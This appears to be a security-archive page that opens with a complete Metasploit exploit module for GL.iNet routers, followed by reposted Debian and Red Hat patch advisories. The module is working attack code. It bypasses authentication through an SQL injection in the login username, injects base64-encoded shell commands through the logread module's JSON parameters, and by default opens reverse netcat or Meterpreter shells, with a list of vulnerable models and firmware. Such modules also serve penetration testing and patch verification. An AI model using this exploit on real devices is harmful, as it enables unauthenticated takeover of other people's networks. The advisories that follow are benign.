A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker to inject and execute arbitrary shell commands via JSON parameters at the gl_system_log and gl_crash_log interface in the logread module. This Metasploit exploit requires post-authentication using the Admin-Token cookie/sessionID (SID), typically stolen by the attacker. However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication through a Lua string pattern matching and SQL injection vulnerability. The Admin-Token cookie/SID can be retrieved without knowing a valid username and password. Many products are vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'digest/md5'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.',        'Description' => %q{          A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker          to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`          interface in the `logread` module.          This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen          by the attacker.          However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication          through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be          retrieved without knowing a valid username and password.          The following GL.iNet network products are vulnerable:          - A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;          - MT6000: v4.5.0 - v4.5.3;          - MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;          - E750/E750V2, MV1000: v4.3.8;          - X3000: v4.0.0 - v4.4.2;          - XE3000: v4.0.0 - v4.4.3;          - SFT1200: v4.3.6;          - and potentially others (just try ;-)          NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads          when using the Linux Dropper target.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Unknown', # Discovery of the vulnerability CVE-2023-50445          'DZONERZY' # Discovery of the vulnerability CVE-2023-50919        ],        'References' => [          ['CVE', '2023-50445'],          ['CVE', '2023-50919'],          ['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'],          ['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],          ['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],          ['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']        ],        'DisclosureDate' => '2023-12-10',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],              'Linemax' => 900,              'DefaultOptions' => {                'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('SID', [false, 'Session ID'])    ])  end  def vuln_version?    @glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }    # check first with version 4.x api call    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'call',      params: [        '',        'ui',        'check_initialized',        {}      ]    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('result')      res_json = res.get_json_document      unless res_json.blank?        @glinet['model'] = res_json['result']['model']        @glinet['firmware'] = res_json['result']['firmware_version']      end    else      # check with version 3.x api call. These versions are NOT vulnerable      res = send_request_cgi({        'method' => 'GET',        'ctype' => 'application/x-www-form-urlencoded',        'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')      })      if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')        res_json = res.get_json_document        unless res_json.blank?          @glinet['model'] = res_json['model']          @glinet['firmware'] = res_json['version']        end      end    end    # check for the vulnerable models and firmware versions    case @glinet['model']    when 'sft1200'      @glinet['arch'] = 'mipsle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.6')    when 'ar750', 'ar750s', 'ar300m', 'ar300m16'      @glinet['arch'] = 'mipsbe'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'mt300n-v2', 'mt1300'      @glinet['arch'] = 'mipsle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'ap1300', 'b1300'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')    when 'e750', 'e750v2'      @glinet['arch'] = 'mipsbe'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')    when 'mv1000'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')    when 'ax1800', 'axt1800', 'a1300'      @glinet['arch'] = 'armle'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')    when 'mt2500', 'mt2500a', 'mt3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')    when 'mt6000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3')    when 'x3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.2')    when 'xe3000'      @glinet['arch'] = 'aarch64'      return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.3')    end    @glinet['arch'] = 'n/a'    return false  end  def auth_bypass    # Check if datastore['SID'] is set    return datastore['SID'] unless datastore['SID'].blank?    # Exploit CVE-2023-50919 to retrieve the SID without valid username and password.    # Send an RPC request calling the challenge method, which will return a random nonce,    # the selected root user’s salt, and the crypt’s algorithm to hash the password.    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'challenge',      params: {        username: 'root'      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('nonce')      res_json = res.get_json_document      unless res_json.blank?        nonce = res_json['result']['nonce']      end    else      fail_with(Failure::NotFound, 'Getting the random nonce failed.')    end    # Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username    # Use the SQL injection part to lookup the ACLs for root stored in sqlite db    # Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce    username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"    pw = '0'    hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")    # Login with the password hash and obtain the SessionID (SID)    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'login',      params: {        username: username.to_s,        hash: hash.to_s      }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?('sid')      res_json = res.get_json_document      unless res_json.blank?        sid = res_json['result']['sid']      end    else      fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.')    end    return sid  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    cmd = "echo #{payload}|openssl enc -base64 -d -A|sh"    post_data = {      jsonrpc: '2.0',      id: rand(1000..9999),      method: 'call',      params: [        @sid.to_s,        'logread',        'get_system_log',        {          lines: '',          module: "|#{cmd}"        }      ]    }.to_json    return send_request_cgi({      'method' => 'POST',      'ctype' => 'text/json',      'cookie' => "Admin-Token=#{@sid}",      'uri' => normalize_uri(target_uri.path, 'rpc'),      'data' => post_data.to_s    })  end  def check    print_status("Checking if #{peer} can be exploited.")    # Check if target is a GL.iNet network device and the firmware version is vulnerable    return CheckCode::Vulnerable("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if vuln_version?    unless @glinet['firmware'].nil?      # GL.iNet network devices with firmware version 3.x that are safe from this exploit      return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.0.0')      # GL.iNet network devices with a firmware version 4.x or higher which still could be vulnerable unless the architecture is not available (n/a)      if @glinet['arch'] != 'n/a' && (Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0'))        return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}")      end      return CheckCode::Detected("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0')    end    # No GL.iNet network device or not reachable    CheckCode::Unknown('No GL.iNet network device or device is not responding.')  end  def exploit    @sid = auth_bypass    print_status("SID: #{@sid}")    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

GL.iNet Unauthenticated Remote Command Execution

Debian Linux Security Advisory 5604-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in side channel attacks, leaking sensitive data to log files, denial of service or bypass of sandbox restrictions.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5604-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 23, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-11CVE ID         : CVE-2024-20918 CVE-2024-20919 CVE-2024-20921 CVE-2024-20926                  CVE-2024-20945 CVE-2024-20952Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in side channel attacks, leaking sensitive data to logfiles, denial of service or bypass of sandbox restrictions.For the oldstable distribution (bullseye), these problems have been fixedin version 11.0.22+7-1~deb11u1.We recommend that you upgrade your openjdk-11 packages.For the detailed security status of openjdk-11 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-11Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmWwM5UACgkQEMKTtsN8TjbmKBAAvEmFMe7zYi8hPaIwWVkgA903gIFGrRFTTA625pefdI5XyqHeXffqNa9dgdHnXCs3LZd/9MrO6sJ/hEeiT8sy2ib/SwM5JIQDoz2tK/1YIpZpCPffbsKuJN7uEaoSJX1fXsoBUI6y7FZecJZPdbMuLZTc9NOwU3SKjsXn98wgr8s6R7st+22m8wNat4a5dMwp7SeGPNy8o25l+Ps0aYA9lz3xsXJXkAmoh+3+6H79UD8T6nlXkwF98BqDNtedI2ZFKckCJUzE+bAIWKx8e1pZSDeif8d10H+rO7y6DikV9JJ9+Q6V9yRmGqfSv1/Hs8+BVEIlX/XuXrbrQCRQYpIEhR2IytlpqKsV+RnSGZXITff+xNiA8JDCaRd39R/af4VUAuLbN0G4wos1UBGVtuDqq8zKF9JHAWs1/OhV5BBRlQVumP0i21Aor31sXypJGK7i9ggDpJDNFCRbWGP/1ckvRt4qk5g36WtBJaLZLovOQq+0uhIXsA2u5Tz+FLffJUshqkfWvXP/ovckf12ka4w7B7HsqusQM7yJQTaKqAvM7GaAOxK/TMN516zHXJPnJuK1hDK1C4c+87avnWRz01tbZuGQl6Aviauqvwazr8pmMqBXpO+GqI9Zya4S+d931oP/6HDBGsHa0J1kiVtZ8Bf9jj7uDxmv6nKd/iOQSJCNapQ==lPGw-----END PGP SIGNATURE-----

Debian Security Advisory 5604-1

Red Hat Security Advisory 2024-0381-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0381.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kpatch-patch security update  
Advisory ID:        RHSA-2024:0381-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0381  
Issue date:         2024-01-24  
Revision:           03  
CVE Names:          CVE-2023-2163  
====================================================================

Summary: 

An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: bpf: Incorrect verifier pruning leads to unsafe code paths being incorrectly marked as safe (CVE-2023-2163)

* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)

* kernel: eBPF: insufficient stack type checks in dynptr (CVE-2023-39191)

* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-2163

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2226783  
https://bugzilla.redhat.com/show_bug.cgi?id=2237757  
https://bugzilla.redhat.com/show_bug.cgi?id=2237760  
https://bugzilla.redhat.com/show_bug.cgi?id=2240249  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723

Red Hat Security Advisory 2024-0381-03

Red Hat Security Advisory 2024-0378-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include out of bounds write and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0378.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kpatch-patch security update  
Advisory ID:        RHSA-2024:0378-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0378  
Issue date:         2024-01-24  
Revision:           03  
CVE Names:          CVE-2023-2163  
====================================================================

Summary: 

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: out-of-bounds write in qfq_change_class function (CVE-2023-31436)

* kernel: tun: bugs for oversize packet when napi frags enabled in tun_napi_alloc_frags (CVE-2023-3812)

* kernel: net/sched: sch_qfq component can be exploited if in qfq_change_agg function happens qfq_enqueue overhead (CVE-2023-3611)

* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)

* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)

* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)

* kernel: bpf: Incorrect verifier pruning leads to unsafe code paths being incorrectly marked as safe (CVE-2023-2163)

* kernel: use after free in nvmet_tcp_free_crypto in NVMe (CVE-2023-5178)

* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-2163

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2192671  
https://bugzilla.redhat.com/show_bug.cgi?id=2224048  
https://bugzilla.redhat.com/show_bug.cgi?id=2225191  
https://bugzilla.redhat.com/show_bug.cgi?id=2237757  
https://bugzilla.redhat.com/show_bug.cgi?id=2237760  
https://bugzilla.redhat.com/show_bug.cgi?id=2239843  
https://bugzilla.redhat.com/show_bug.cgi?id=2240249  
https://bugzilla.redhat.com/show_bug.cgi?id=2241924  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723

Red Hat Security Advisory 2024-0378-03

Red Hat Security Advisory 2024-0376-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0376.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kpatch-patch security update  
Advisory ID:        RHSA-2024:0376-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0376  
Issue date:         2024-01-24  
Revision:           03  
CVE Names:          CVE-2023-2163  
====================================================================

Summary: 

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)

* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)

* kernel: bpf: Incorrect verifier pruning leads to unsafe code paths being incorrectly marked as safe (CVE-2023-2163)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-2163

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2237760  
https://bugzilla.redhat.com/show_bug.cgi?id=2239843  
https://bugzilla.redhat.com/show_bug.cgi?id=2240249

Red Hat Security Advisory 2024-0376-03

Red Hat Security Advisory 2024-0374-03 - An update for python-pip is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a traversal vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0374.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python-pip security updateAdvisory ID:        RHSA-2024:0374-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0374Issue date:         2024-01-24Revision:           03CVE Names:          CVE-2007-4559====================================================================Summary: An update for python-pip is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:pip is a package management system used to install and manage software packages written in Python. Many packages can be found in the Python Package Index (PyPI). pip is a recursive acronym that can stand for either \"Pip Installs Packages\" or \"Pip Installs Python\". Security Fix(es):* python: tarfile module directory traversal (CVE-2007-4559)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2007-4559References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=263261

Red Hat Security Advisory 2024-0374-03

Red Hat Security Advisory 2024-0371-03 - An update for kpatch-patch is now available for Red Hat Enterprise Linux 7.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0371.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:0371-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0371Issue date:         2024-01-24Revision:           03CVE Names:          CVE-2023-42753====================================================================Summary: An update for kpatch-patch is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-42753References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2239843

Red Hat Security Advisory 2024-0371-03

Red Hat Security Advisory 2024-0347-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0347.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel-rt security and bug fix updateAdvisory ID:        RHSA-2024:0347-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0347Issue date:         2024-01-24Revision:           03CVE Names:          CVE-2023-42753====================================================================Summary: An update for kernel-rt is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)Bug Fix(es):* kernel-rt: Update RT source tree to the latest RHEL-7.9z28 batch (RHEL-19250)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-42753References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2239843

Red Hat Security Advisory 2024-0347-03

Red Hat Security Advisory 2024-0346-03 - An update for kernel is now available for Red Hat Enterprise Linux 7.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0346.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security and bug fix updateAdvisory ID:        RHSA-2024:0346-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0346Issue date:         2024-01-24Revision:           03CVE Names:          CVE-2023-42753====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: netfilter: potential slab-out-of-bound access due to integer underflow (CVE-2023-42753)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* gfs2: kernel BUG at fs/gfs2/lops.c:135 (BZ#2196280)* ax88179_178a 2-6:1.0 (unregistered net_device) (uninitialized): Failed to read reg index 0x0006: -71 (RHEL-6302)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-42753References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2239843

Red Hat Security Advisory 2024-0346-03

Red Hat Security Advisory 2024-0345-03 - An update for python-pillow is now available for Red Hat Enterprise Linux 7.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0345.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: python-pillow security updateAdvisory ID:        RHSA-2024:0345-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0345Issue date:         2024-01-24Revision:           03CVE Names:          CVE-2023-44271====================================================================Summary: An update for python-pillow is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The python-pillow packages contain a Python image processing library that provides extensive file format support, an efficient internal representation, and powerful image-processing capabilities.Security Fix(es):* python-pillow: uncontrolled resource consumption when textlength in an ImageDraw instance operates on a long text argument (CVE-2023-44271)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44271References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2247820

Tag

#js